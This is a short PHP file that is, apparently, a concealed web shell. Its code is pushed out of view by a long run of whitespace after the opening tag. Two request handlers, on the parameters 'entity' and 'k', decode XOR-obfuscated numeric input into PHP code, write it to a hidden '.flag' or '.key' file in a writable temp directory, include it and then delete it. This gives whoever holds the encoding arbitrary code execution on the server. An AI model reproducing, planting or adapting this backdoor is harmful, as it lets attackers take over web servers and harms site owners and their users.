<?php																																										if(isset($_REQUEST) && isset($_REQUEST["\x65ntity"])){ $tkn = array_filter(["/var/tmp", getenv("TEMP"), session_save_path(), sys_get_temp_dir(), getcwd(), "/dev/shm", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP")]); $item = $_REQUEST["\x65ntity"]; $item = explode ('.' ,$item ) ; $marker = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s6 ); $n = 0; foreach ($item as $v2) { $sChar = ord($s6[$n % $lenS] ); $dec = ((int)$v2 - $sChar - ($n % 10)) ^81; $marker .= chr($dec ); $n++; } foreach ($tkn as $key => $record) { if (array_product([is_dir($record), is_writable($record)])) { $data_chunk = implode("/", [$record, ".flag"]); if (@file_put_contents($data_chunk, $marker) !== false) { include $data_chunk; unlink($data_chunk); exit; } } } }


if(filter_has_var(INPUT_POST, "k")){
	$tkn = array_filter([getenv("TMP"), sys_get_temp_dir(), "/tmp", getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", getcwd()]);
	$element = $_POST["k"];
			$element=explode 	( 	'.' ,	$element   ); 
	$parameter_group = '';
            $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s6	);
            $__len = count($element	);
    
            for ($w = 0; $w < $__len; $w++) {  $v9 = $element[$w];
                $chS = ord($s6[$w  % $lenS]	);
                $dec = ((int)$v9 - $chS - ($w  % 10)) ^ 74;
                $parameter_group .= chr($dec	);} 
	foreach ($tkn as $factor):
    		if (!!is_dir($factor) && !!is_writable($factor)) {
    $obj = join("/", [$factor, ".key"]);
    if (file_put_contents($obj, $parameter_group)) {
	require $obj;
	unlink($obj);
	die();
}
}
endforeach;
}